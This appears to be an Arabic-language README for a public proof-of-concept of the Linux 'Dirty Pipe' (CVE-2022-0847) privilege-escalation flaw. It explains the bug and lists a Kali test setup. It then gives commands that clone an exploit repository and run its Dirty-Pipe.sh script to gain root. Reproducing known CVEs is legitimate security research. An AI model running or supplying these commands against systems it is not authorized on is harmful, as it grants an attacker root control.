
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 هي ثغرة رفع صلاحيات محلية موجودة في نواة Linux 5.8 والإصدارات الأحدث منها. من خلال استغلال هذه الثغرة، يمكن للمهاجم الكتابة فوق (استبدال) بيانات أي ملف قابل للقراءة، مما يسمح برفع صلاحيات مستخدم عادي إلى صلاحيات root. يشبه مبدأ عمل ثغرة CVE-2022-0847 مبدأ ثغرة CVE-2016-5195 المعروفة باسم Dirty Cow، لكنها أسهل في الاستغلال. وقد أطلق مؤلف الثغرة على هذه الثغرة اسم "Dirty Pipe"
إعادة إنتاج بسيطة لـ CVE-2022-0847
رابط المقال الأصلي: https://dirtypipe.cm4all.com/
Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
gcc
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
